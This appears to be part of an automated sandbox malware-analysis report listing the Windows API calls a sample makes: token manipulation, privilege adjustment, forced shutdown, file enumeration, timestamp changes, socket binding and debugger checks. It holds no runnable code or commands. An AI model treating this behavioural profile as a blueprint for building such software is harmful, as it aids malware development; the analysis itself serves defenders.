      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063E5
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,4B4B5631), ref: 004063EF
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063F2
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,485A3976), ref: 004063F9
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063FC
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,47377263), ref: 00406406
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406409
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,356A7738), ref: 00406413
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406416
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,66516864), ref: 0040641D
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406420
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,31366B4A), ref: 0040642A
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040642D
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,49315645), ref: 00406437
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040643A
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,52554D49), ref: 00406444
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406447
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,37783247), ref: 00406451
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406454
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,73734533), ref: 0040645E
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406461
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,5A544772), ref: 0040646B
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040646E
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,344A4B51), ref: 00406478
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040647B
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,48376271), ref: 00406485
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406488
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,4A464336), ref: 00406492
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406495
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,62354F4D), ref: 0040649F
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004064A2
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,696F624E), ref: 004064AC
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004064AF
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,34367575), ref: 004064B9
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004064BC
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,?), ref: 004064C6
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004064C9
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 00406586
    • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,?), ref: 004065A6
    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00004000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004065C0
    • GetLengthSid.ADVAPI32(?,?,?), ref: 004065D8
    • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008,?,?), ref: 004065EB
    • FreeSid.ADVAPI32(?,?,?), ref: 004065F0
    • SetTokenInformation.ADVAPI32(?,0000001B,00000000,00000004,?,?), ref: 00406604
    • CreateEnvironmentBlock.USERENV(?,?,00000001,?,?), ref: 0040660F
    • GetProcessHeap.KERNEL32(00000008,00000041,?,?), ref: 00406679
    • HeapAlloc.KERNEL32(00000000,?,?), ref: 00406680
    • GetCaretBlinkTime.USER32 ref: 0040669C
    • GetProcessHeap.KERNEL32(00000008,00000031,?,?), ref: 004066FF
    • HeapAlloc.KERNEL32(00000000,?,?), ref: 00406706
    • CreatePopupMenu.USER32 ref: 0040671A
    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?), ref: 00406777
    • OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 00406793
    • CloseHandle.KERNEL32(?), ref: 004067A8
    • CloseHandle.KERNEL32(00007479), ref: 004067B0
    • DestroyEnvironmentBlock.USERENV(00000000,?,?), ref: 004067BB
    • CloseHandle.KERNEL32(?), ref: 004067C4
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 004067C9
    • HeapFree.KERNEL32(00000000,?,?), ref: 004067D6
    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004067DB
    • HeapFree.KERNEL32(00000000,?,?), ref: 004067E2
    • CloseHandle.KERNEL32(?), ref: 004067ED
    • CloseHandle.KERNEL32(00000000), ref: 004067F0
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000250,?,7142434B,0041CD20), ref: 0040BB67
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BB70
    • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BB86
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BB89
    • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BB9D
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BBA0
    • GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040BBE4
    • HeapAlloc.KERNEL32(00000000), ref: 0040BBE7
    • ReleaseCapture.USER32 ref: 0040BBF9
    • GetSystemDirectoryW.KERNEL32(0041CD24,00000103), ref: 0040BC4D
    • FindClose.KERNEL32(?), ref: 0040BDC4
      • Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0041CD20), ref: 0040F60E
      • Part of subcall function 0040F5D9: HeapAlloc.KERNEL32(00000000), ref: 0040F611
      • Part of subcall function 0040F5D9: GetShellWindow.USER32 ref: 0040F62D
      • Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F678
      • Part of subcall function 0040F5D9: HeapAlloc.KERNEL32(00000000), ref: 0040F67B
      • Part of subcall function 0040F5D9: GetLogicalDrives.KERNEL32 ref: 0040F68F
      • Part of subcall function 0040F5D9: GetModuleHandleA.KERNEL32(0040BF20,00000000), ref: 0040F6B9
      • Part of subcall function 0040F5D9: GetProcAddress.KERNEL32(00000000), ref: 0040F6C0
      • Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F6D0
      • Part of subcall function 0040F5D9: HeapFree.KERNEL32(00000000), ref: 0040F6DD
      • Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000000,0040BF20), ref: 0040F6E2
      • Part of subcall function 0040F5D9: HeapFree.KERNEL32(00000000), ref: 0040F6E9
    • lstrcatW.KERNEL32(0041CD24,00000000), ref: 0040BC84
    • FindFirstFileW.KERNEL32(0041CD24,?), ref: 0040BC8E
    • StrRChrW.SHLWAPI(?,00000000,0000002E), ref: 0040BCD3
    • FindNextFileW.KERNEL32(?,?), ref: 0040BD84
    • FindFirstFileW.KERNEL32(0041CD24,?), ref: 0040BD90
    • GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0040BDDB
    • HeapFree.KERNEL32(00000000), ref: 0040BDDE
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BDE8
    • HeapFree.KERNEL32(00000000), ref: 0040BDEB
    • GetProcessHeap.KERNEL32(00000000,0041CD24,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BDFA
    • HeapFree.KERNEL32(00000000), ref: 0040BDFD
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BE07
    • HeapFree.KERNEL32(00000000), ref: 0040BE0A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetSystemTime.KERNEL32(?,00000000,?,00000000), ref: 0040DAF2
    • SystemTimeToFileTime.KERNEL32(?,?,0000003B), ref: 0040DBA6
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DBAD
    • SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0040DBB6
    • GetProcessHeap.KERNEL32(00000008,00000069), ref: 0040DC31
    • HeapAlloc.KERNEL32(00000000), ref: 0040DC38
    • ReleaseCapture.USER32 ref: 0040DC47
      • Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,00000000,001CFDA8,001CFDA8,001CFDA8,001CFDA8,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D991
      • Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0040D9AB
      • Part of subcall function 0040D97F: HeapAlloc.KERNEL32(00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9B2
      • Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,7142434B,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D9CD
      • Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000000,00000000,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9DA
      • Part of subcall function 0040D97F: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040D9E1
    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040DC8F
    • GetFileTime.KERNEL32(00000000,?,?,00000016), ref: 0040DCAA
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DCBB
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DCC8
    • SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0040DCD5
    • CloseHandle.KERNEL32(00000000), ref: 0040DCDC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DCE5
    • HeapFree.KERNEL32(00000000), ref: 0040DCEC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DCF5
    • HeapFree.KERNEL32(00000000), ref: 0040DCFC
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040D50E
    • HeapAlloc.KERNEL32(00000000), ref: 0040D515
    • GetDesktopWindow.USER32 ref: 0040D524
    • CoInitialize.OLE32(00000000), ref: 0040D553
    • CoCreateInstance.OLE32(00410380,00000000,00000001,00410370,?), ref: 0040D572
    • StrStrIW.SHLWAPI(00000000), ref: 0040D634
    • StrStrIW.SHLWAPI(00000000,00000000), ref: 0040D668
    • StrStrIW.SHLWAPI(00000000,00000000), ref: 0040D6B3
    • StrCpyNW.SHLWAPI(?,00000002,-000000FE), ref: 0040D6D1
    • GetFileAttributesW.KERNEL32(?), ref: 0040D6DE
    • CoTaskMemFree.OLE32(00000000), ref: 0040D6FA
    • CoTaskMemFree.OLE32(00000000), ref: 0040D6FF
    • CoTaskMemFree.OLE32(00000001), ref: 0040D70B
    • CoTaskMemFree.OLE32(?), ref: 0040D71B
    • CoUninitialize.OLE32 ref: 0040D74C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040D754
    • HeapFree.KERNEL32(00000000), ref: 0040D75B
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 0040C600
    • socket.WS2_32(00000002,00000001,00000000), ref: 0040C60D
    • GetCurrentProcessId.KERNEL32 ref: 0040C622
    • GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040C675
    • HeapAlloc.KERNEL32(00000000), ref: 0040C67C
    • GetProcessWindowStation.USER32 ref: 0040C692
    • inet_addr.WS2_32(00000000), ref: 0040C6C1
    • htons.WS2_32(?), ref: 0040C6CC
    • bind.WS2_32(?,?,00000010), ref: 0040C6E7
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C6F4
    • HeapFree.KERNEL32(00000000), ref: 0040C6FB
    • closesocket.WS2_32(?), ref: 0040C717
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C720
    • HeapFree.KERNEL32(00000000), ref: 0040C727
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401D6F
    • HeapAlloc.KERNEL32(00000000), ref: 00401D72
    • GetMenuCheckMarkDimensions.USER32 ref: 00401D83
    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00401DAE
    • OpenProcessToken.ADVAPI32(00000000), ref: 00401DB5
    • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 00401DC3
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00401DE2
    • ExitWindowsEx.USER32(00000006,00000000), ref: 00401DF1
    • ExitWindowsEx.USER32(00000004,00000000), ref: 00401E01
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E06
    • HeapFree.KERNEL32(00000000), ref: 00401E09
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042C92D
      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
    • _TranslateName.LIBCMT ref: 0042C964
      • Part of subcall function 0042C8E9: _strlen.LIBCMT ref: 0042C8EB
      • Part of subcall function 0042C8E9: _GetPrimaryLen.LIBCMT ref: 0042C905
      • Part of subcall function 0042C8E9: EnumSystemLocalesA.KERNEL32(0042C796,00000001,0042C996,00000083,?,000000BC,?,004270F1,?,000000BC,?), ref: 0042C914
    • _TranslateName.LIBCMT ref: 0042C9A8
      • Part of subcall function 0042C882: _strlen.LIBCMT ref: 0042C884
      • Part of subcall function 0042C882: _strlen.LIBCMT ref: 0042C897
      • Part of subcall function 0042C882: _GetPrimaryLen.LIBCMT ref: 0042C8BA
      • Part of subcall function 0042C882: EnumSystemLocalesA.KERNEL32(0042C5C5,00000001,0042C9C6), ref: 0042C8C9
    • _strlen.LIBCMT ref: 0042C9DD
    • EnumSystemLocalesA.KERNEL32(0042C4C3,00000001,00000083,?,000000BC,?,004270F1,?,000000BC,?), ref: 0042C9F5
    • GetUserDefaultLCID.KERNEL32(00000083,?,000000BC,?,004270F1,?,000000BC,?), ref: 0042CA0E
      • Part of subcall function 0042C3CE: GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C40D
      • Part of subcall function 0042C3CE: GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C436
      • Part of subcall function 0042C3CE: GetACP.KERNEL32(?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C44A
    • IsValidCodePage.KERNEL32(00000000,?,004270F1,?,000000BC,?), ref: 0042CA60
    • IsValidLocale.KERNEL32(?,00000001,?,004270F1,?,000000BC,?), ref: 0042CA73
    • __itow_s.LIBCMT ref: 0042CB02
      • Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
      • Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641
    • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,004270F1,?,000000BC,?), ref: 0042CADD
    • GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,?,004270F1,?,000000BC,?), ref: 0042CAF1
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0040D8EA
    • SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0040D920
    • LocalAlloc.KERNEL32(00000040,00000014), ref: 0040D92A
    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0040D934
    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0040D941
    • SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0040D94B
    • FreeSid.ADVAPI32(00000000), ref: 0040D95A
    • LocalFree.KERNEL32(00000000), ref: 0040D96F
    • LocalFree.KERNEL32(00000000), ref: 0040D976
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042C5DD
      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
    • _LcidFromHexString.LIBCMT ref: 0042C5EA
    • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C610
    • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C651
    • _strlen.LIBCMT ref: 0042C69D
    • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C6F4
    • _strlen.LIBCMT ref: 0042C731
    • _TestDefaultLanguage.LIBCMT ref: 0042C760
      • Part of subcall function 0042C56A: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 0042C58B
      • Part of subcall function 0042C56A: _GetPrimaryLen.LIBCMT ref: 0042C5AC
      • Part of subcall function 0042C56A: _strlen.LIBCMT ref: 0042C5B4
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • ___crtGetLocaleInfoA.LIBCMT ref: 00424522
    • GetLastError.KERNEL32 ref: 00424530
    • ___crtGetLocaleInfoA.LIBCMT ref: 00424549
    • ___crtGetLocaleInfoA.LIBCMT ref: 00424584
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
      • Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
      • Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641
    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 0042460D
      • Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD
    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 0042462D
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3
    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 00424669
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004046A6
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?), ref: 004046DA
    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004046EA
    • OpenProcessToken.ADVAPI32(00000000), ref: 004046F1
    • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00404701
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?), ref: 00404731
    • CloseHandle.KERNEL32(?), ref: 0040473C
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • IsDebuggerPresent.KERNEL32 ref: 00423AF2
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
    • UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
    • GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
    • TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C40D
    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C436
    • GetACP.KERNEL32(?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C44A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • ___crtGetLocaleInfoA.LIBCMT ref: 00424522
    • GetLastError.KERNEL32 ref: 00424530
    • ___crtGetLocaleInfoA.LIBCMT ref: 00424549
    • ___crtGetLocaleInfoA.LIBCMT ref: 00424584
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
      • Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
      • Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641
      • Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3
    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 00424669
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • GetLocaleInfoW.KERNEL32(00000080,?,00000000,00000000,?,?,?,00000080,?,?,00000080), ref: 0042B9F8
      • Part of subcall function 0042BB4E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00424C51,00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE), ref: 0042BB93
    • GetLocaleInfoW.KERNEL32(00000080,?,00000000,00000080,?,?,00000080,?,?,00000080), ref: 0042BA61
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00000000,00000000,00000000,?,?,00000080,?,?,00000080), ref: 0042BA7F
    • __freea.LIBCMT ref: 0042BA88
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042C7AD
